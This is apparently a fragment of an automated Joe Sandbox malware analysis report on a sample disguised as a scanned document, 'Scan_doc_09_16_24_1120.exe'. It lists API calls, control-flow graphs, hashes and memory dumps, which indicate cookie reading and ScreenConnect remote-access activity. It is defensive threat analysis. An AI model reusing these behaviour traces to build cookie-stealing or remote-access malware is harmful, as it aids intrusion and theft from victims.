                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: b4d7da9ab7697b6eb182eaed54510f9b97a0ef4b8ad8cee7fa86eb9f5fb07580
                                                                                                                                                                                                                                                                          • Instruction ID: b96e6ea57971ae6223ec54ef727b818b3b0fc062d2273d9075bc556eb640f995
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4d7da9ab7697b6eb182eaed54510f9b97a0ef4b8ad8cee7fa86eb9f5fb07580
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F05EBC9052609FCF816F19FC495497B60FBD67207411266F622D63B1C7392982CFC2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe,00000104), ref: 00832F93
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083305E
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833068
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe
                                                                                                                                                                                                                                                                          • API String ID: 2506810119-1486388367
                                                                                                                                                                                                                                                                          • Opcode ID: 145fba466864787501e90e2117251c15aa2cafc1f5ea5d3b420a5dd4016088ea
                                                                                                                                                                                                                                                                          • Instruction ID: 72a87333a4aa64001846fe9a90099b49d89d1e6b8ef415b671f58410da5baa2a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 145fba466864787501e90e2117251c15aa2cafc1f5ea5d3b420a5dd4016088ea
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7318DB5A00618AFCB25EB99DC859AEBBBCFBC5710F104066F404D7211DA709A80CBD2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00832594,00000000,?,00841B50,?,?,?,00832737,00000004,InitializeCriticalSectionEx,0083BC48,InitializeCriticalSectionEx), ref: 008325F0
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00832594,00000000,?,00841B50,?,?,?,00832737,00000004,InitializeCriticalSectionEx,0083BC48,InitializeCriticalSectionEx,00000000,?,008324C7), ref: 008325FA
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00832622
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                          • Opcode ID: 78146d6b4a9f6bcfbcd793deda2e2f5c3025218a58c380ad6c067ffe0dc9b380
                                                                                                                                                                                                                                                                          • Instruction ID: 0b01b588281ecd46487cf67a6fc0046232824fa394f9c6608b39968d7e450ab8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78146d6b4a9f6bcfbcd793deda2e2f5c3025218a58c380ad6c067ffe0dc9b380
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE01270640704BBDF112B60EC47B593F54FFA0B51F104420FA1DE40A1E7A1A9549685
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00835784,00000000,00000000,00000000,00000000,?,00835981,00000006,FlsSetValue), ref: 0083580F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00835784,00000000,00000000,00000000,00000000,?,00835981,00000006,FlsSetValue,0083C4D8,FlsSetValue,00000000,00000364,?,008344F6), ref: 0083581B
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00835784,00000000,00000000,00000000,00000000,?,00835981,00000006,FlsSetValue,0083C4D8,FlsSetValue,00000000), ref: 00835829
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                          • Opcode ID: d2c74452c88497e7cadf1b9b2b5a390de5f735069e1928bc4126a796f6a639a4
                                                                                                                                                                                                                                                                          • Instruction ID: 7595be3f995d09d1431059c17949d7dcb745537379d13c3d9c9ca8ee79b17083
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2c74452c88497e7cadf1b9b2b5a390de5f735069e1928bc4126a796f6a639a4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B01A776615B26ABCB214A68EC44A577798FFC57A1F200934FA1AD7240DB20D800C6E0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834A27
                                                                                                                                                                                                                                                                            • Part of subcall function 0083474D: IsProcessorFeaturePresent.KERNEL32(00000017,0083473C,00000000,?,00000004,00000000,?,?,?,?,00834749,00000000,00000000,00000000,00000000,00000000), ref: 0083474F
                                                                                                                                                                                                                                                                            • Part of subcall function 0083474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00834771
                                                                                                                                                                                                                                                                            • Part of subcall function 0083474D: TerminateProcess.KERNEL32(00000000), ref: 00834778
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                                          • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                                          • Instruction ID: 61dc99f39bb7982f747639ddfe075047ff8575ac0051157fbd952d07a0dc185f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6851A375E00119AFDF14CFA8C881AAEFBF5FF88314F24416AE854E7351E675AE018B90

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:17.7%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                          Total number of Nodes:145
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:20

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2795577677.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848f10000_dfsvc.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 1024 7ff848f1e8d2-7ff848f1e998 1028 7ff848f1e99a-7ff848f1e9a2 1024->1028 1029 7ff848f1e9a5-7ff848f1e9aa 1024->1029 1028->1029 1030 7ff848f1e9ac-7ff848f1e9b4 1029->1030 1031 7ff848f1e9b7-7ff848f1e9c3 1029->1031 1030->1031 1032 7ff848f1ea49-7ff848f1ea50 1031->1032 1033 7ff848f1e9c9-7ff848f1e9fc 1031->1033 1034 7ff848f1ea6b-7ff848f1eac7 InternetGetCookieW 1032->1034 1040 7ff848f1e9fe-7ff848f1ea00 1033->1040 1041 7ff848f1ea52-7ff848f1ea58 1033->1041 1035 7ff848f1eac9 1034->1035 1036 7ff848f1eacf-7ff848f1eae2 1034->1036 1035->1036 1038 7ff848f1eae4-7ff848f1eb06 1036->1038 1039 7ff848f1eb07-7ff848f1eb39 call 7ff848f1eb55 1036->1039 1038->1039 1052 7ff848f1eb3b 1039->1052 1053 7ff848f1eb40-7ff848f1eb54 1039->1053 1042 7ff848f1ea39-7ff848f1ea47 1040->1042 1043 7ff848f1ea02-7ff848f1ea14 1040->1043 1049 7ff848f1ea5a-7ff848f1ea66 1041->1049 1042->1049 1047 7ff848f1ea18-7ff848f1ea2b 1043->1047 1048 7ff848f1ea16 1043->1048 1047->1047 1051 7ff848f1ea2d-7ff848f1ea35 1047->1051 1048->1047 1049->1034 1051->1042 1052->1053
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2795577677.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848f10000_dfsvc.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CookieInternet
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 930238652-0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 1230 7ff848f19958-7ff848f199e0 1234 7ff848f199ea-7ff848f19a8a CreateFileW 1230->1234 1235 7ff848f199e2-7ff848f199e7 1230->1235 1237 7ff848f19a8c 1234->1237 1238 7ff848f19a92-7ff848f19ac5 1234->1238 1235->1234 1237->1238
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2795577677.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848f10000_dfsvc.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2795220363.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848dfd000_dfsvc.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:13.3%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                          Total number of Nodes:12
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                          execution_graph 9988 7ff848f184b8 9989 7ff848f184bf SetProcessMitigationPolicy 9988->9989 9991 7ff848f18552 9989->9991 9992 7ff848f13dfa 9993 7ff848f2f470 CloseHandle 9992->9993 9995 7ff848f2f4eb 9993->9995 9996 7ff848f1f67b 9997 7ff848f1f687 CreateFileW 9996->9997 9999 7ff848f1f7bc 9997->9999 10000 7ff848f14890 10001 7ff848f14899 GetTokenInformation 10000->10001 10003 7ff848f2f2d7 10001->10003

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 192 7ff848f14890-7ff848f148d9 198 7ff848f148dc 192->198 198->198 199 7ff848f148de-7ff848f14949 198->199 207 7ff848f1494c 199->207 207->207 208 7ff848f1494e-7ff848f2f2d5 GetTokenInformation 207->208 214 7ff848f2f2dd-7ff848f2f30e 208->214 215 7ff848f2f2d7 208->215 215->214
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2289920314.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InformationToken
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4114910276-0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 217 7ff848f1f67b-7ff848f1f710 222 7ff848f1f71a-7ff848f1f7ba CreateFileW 217->222 223 7ff848f1f712-7ff848f1f717 217->223 225 7ff848f1f7bc 222->225 226 7ff848f1f7c2-7ff848f1f7f5 222->226 223->222 225->226
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2289920314.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 823142352-0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 228 7ff848f184b8-7ff848f18550 SetProcessMitigationPolicy 231 7ff848f18558-7ff848f18587 228->231 232 7ff848f18552 228->232 232->231
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2289920314.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088084561-0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 234 7ff848f13eaa-7ff848f184ef 236 7ff848f184f6-7ff848f18550 SetProcessMitigationPolicy 234->236 237 7ff848f18558-7ff848f18587 236->237 238 7ff848f18552 236->238 238->237
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2289920314.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088084561-0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 338 7ff848f13dfa-7ff848f2f4e9 CloseHandle 341 7ff848f2f4eb 338->341 342 7ff848f2f4f1-7ff848f2f51f 338->342 341->342
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2289920314.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $jq$$jq
                                                                                                                                                                                                                                                                          • API String ID: 0-3720491408
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 0-76226702
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (nq
                                                                                                                                                                                                                                                                          • API String ID: 0-2756854522
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: LRjq
                                                                                                                                                                                                                                                                          • API String ID: 0-665714880
                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: (nq
• API String ID: 0-2756854522
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 988409015f1e9fd2bfcda71f2e4adf9bdb8e9534f0d4fe6a2d2c483bf1b0cb09
                                                                                                                                                                                                                                                                          • Instruction ID: eed9eb80af965c1a2377b34be5673694bc1d526cfa64c06a4393e251c2e7aa72
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 988409015f1e9fd2bfcda71f2e4adf9bdb8e9534f0d4fe6a2d2c483bf1b0cb09
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89318031A0014ADFCF05DFA8E9909CDBBB2FF89304F14846AE505BB265D732690BCB90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 89053d376e0959ec418fc3cd703cccd115447c86f75dda1be49cdcd125e23b0d
                                                                                                                                                                                                                                                                          • Instruction ID: b627c02aecb960236ab39599e423b3906e6d7834e73a7f5acb27f41f84b0b4af
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89053d376e0959ec418fc3cd703cccd115447c86f75dda1be49cdcd125e23b0d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5216B30F142458FC706AF68C9945AEBFB2EFC9600B1481EAD8499B3A5DB319D46CB91
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6ced90de2fdc7e825bbbe9bdb47c3a20768a5d11a043cf33fd5b28cfea5e24ae
                                                                                                                                                                                                                                                                          • Instruction ID: 64cc2b43048fc5010c43795e3be3649153778a64f6ba448433a6b83be2157f85
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ced90de2fdc7e825bbbe9bdb47c3a20768a5d11a043cf33fd5b28cfea5e24ae
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D21C0B57402405BD705EB78EC91BAE7BA6EFC5301F04C52AE445AB355EF30AD068BA2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9da9cf60b1bb778c7b20fa8efe491a8e535819776aeb42172a9dd5c6a2141678
                                                                                                                                                                                                                                                                          • Instruction ID: 403d9357001e300fe9b594752fabad324e81418b98acac5389f40dc641c28c9e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9da9cf60b1bb778c7b20fa8efe491a8e535819776aeb42172a9dd5c6a2141678
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84213C302106058FC734EF26D848A9AB7F5EF45324F008B6DD5A2976E1EB31E94ACF90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3a17a20c39d8c0824d9986ede2be84575ba2692145d185ed1ffa84e82e31eb10
                                                                                                                                                                                                                                                                          • Instruction ID: a9cb8fd918cef3b238b055727cd8d114cd95a11494680380b4e3a5c79276f189
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a17a20c39d8c0824d9986ede2be84575ba2692145d185ed1ffa84e82e31eb10
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 111190B57402045BD704EB78E951B6EB7A6EFC4311F10C92AE505AB354EF70AE0587E2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 94512e5a84e693cfc7e819da607f4542c919bbc0174e9d35cae504d34645a82b
                                                                                                                                                                                                                                                                          • Instruction ID: b57f8340804db0558f5c5704bc1a5b89b9b0a999b04734286dae54e85ccc54d4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94512e5a84e693cfc7e819da607f4542c919bbc0174e9d35cae504d34645a82b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D611427290424A9FCF01DFA8C9409DEBBF5EF4A314B108456E948FF261D771AA06CB90
                                                                                                                                                                                                                                                                          Memory Dump Source
